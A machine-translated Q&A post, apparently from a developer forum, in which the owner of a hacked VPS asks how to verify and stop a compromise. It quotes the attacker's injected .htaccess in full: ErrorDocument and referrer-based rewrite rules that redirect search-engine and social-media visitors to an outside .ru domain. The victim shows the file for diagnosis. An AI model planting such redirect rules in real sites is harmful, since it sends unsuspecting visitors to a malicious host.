Ash*_*Ash 0 security linux ubuntu ruby-on-rails-3 apache-2.2
可能重复:
我的服务器被黑了 紧急情况
所以我非常恐慌。
我有一个正在构建的 Rails 应用程序,它托管在 VPS 上,用于临时环境。我在本月早些时候对其进行了配置,一切正常(特别是在部署 capistrano 时)。今天我把最新的开发代码部署到了web服务器上并去测试了。我点击了 URL ( http://openstudyr.ashleyangell.com ) 并注意到它正在对我从未听说过的“ http://guide-securesoft.ru/fliht/index.php?1314066061 ”进行奇怪的查找之前,点击我的任何链接也是(最终重定向到相同/相似的 URL)。
我不擅长 Linux,但我足够聪明,可以确保我的所有 SSH 都通过密钥身份验证完成,我从不以 root 身份运行,root 密码是一个长度约为 24 个字符的字母数字字符串。
我检查了虚拟主机的 Apache 配置,但它与我离开时完全一样。
我感觉我的心脏快要射出胸膛,爆炸了。我不知道该怎么做,或者接下来要检查什么。
我尝试在域中搜索类似的问题,但没有发现任何明显的问题。
任何人都可以帮忙吗?我怎样才能 a) 验证我是否已经被入侵,b) 解决问题并阻止它发生(我知道在 a 之前无法真正回答)。
:(
更新#1:
似乎我的所有 URL 在从浏览器执行时都在执行自动重定向,但是如果我直接点击 URL,它们就可以正常工作。奇怪的。
更新#2:
它的父域http://ashleyangell.com(我的个人博客)也有同样的问题。但是,所有其他虚拟主机似乎不受影响。
更新 #3:
我在其他机器上测试过。他们都在做同样的行为,这让我认为它与我的开发机器或互联网连接无关。(是的?)
更新#4:
我跑sudo grep -ri -l "guide-securesoft" /var了,服务器的所有 .htaccess 文件都匹配了!所以我选择了有问题的域并运行cat /var/www/vhosts/openstudyr.ashleyangell.com/.htaccess,这就是我得到的(我清理了它以使其可读):
ErrorDocument 400 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 401 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 403 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 404 http://guide-securesoft.ru/fliht/index.php
ErrorDocument 500 http://guide-securesoft.ru/fliht/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://guide-securesoft.ru/fliht/index.php [R=301,L]
</IfModule>
...所以至少现在我知道他们是怎么做的 - 但我怎么能阻止它再次发生?
| 归档时间: |
|
| 查看次数: |
1128 次 |
| 最近记录: |